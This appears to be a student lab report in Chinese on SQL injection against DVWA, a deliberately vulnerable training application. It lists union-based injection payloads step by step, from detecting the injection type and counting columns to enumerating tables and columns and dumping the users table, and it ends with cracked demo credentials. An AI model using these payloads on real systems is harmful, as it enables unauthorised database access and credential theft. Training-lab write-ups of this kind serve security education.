|
Sql注入 1.判断注入类型--是字符型还是数字型 1'+and+1='1 1'+and+1='2
说明是字符型 2.判断字段数 1'+order+by+2--+(注意在网页里面--+相当于#,+相当于空格)
当输入1和2时候都有显示但是输入3的时候报错了,说明只有两个字段,即是这里的First name、surname。 3.判断回显位置 输入1'+union+select+1,2--+
查询成功,说明执行的SQL语句为select First name,Surnamefrom表 where ID=’ id’ 4.爆破当前数据库名database()以及数据库的用户名user() 1'+union+select+databse(),user()--+ information_schema--元数据库---默认数据库 schemata表---默认的表名---存了其他数据库的库名 tables表---默认的表名-----存了其他数据库的表名---table_Schema(存当前数据库名),table_name(存当前数据库的表名) columns表---默认的表名----存了其他数据库的字段名---column_name
说明当前的数据库为dvwa。 5.爆破表名--users,guestbook 1'+union+select+1,table_name+from+information_schema.tables+where+table_schema='dvwa'--+
说明数据库dvwa中一共有两个表,分别是guestbook,users。 6.字段名 1'+union+select+1,column_name+from+information_schema.columns+where+table_schema='dvwa'+and+table_name='users'--+
说明users表中有8个字段,分别是users_id,first_name,users,password,avater,last_login,failed_login. 7.获取账号密码 1'+union+select+user,password+from+users--+ 网页里面写 1' union select user,password from users#
然后通过md5 解密可以得到这些账号和密码admin->password, gordonb->abc123,1337->charley,pablo->letmein,smithy->password
| |||||||||
|
四、实验总结 | |||||||||
|
评语 | |||||||||

















501

被折叠的 条评论
为什么被折叠?



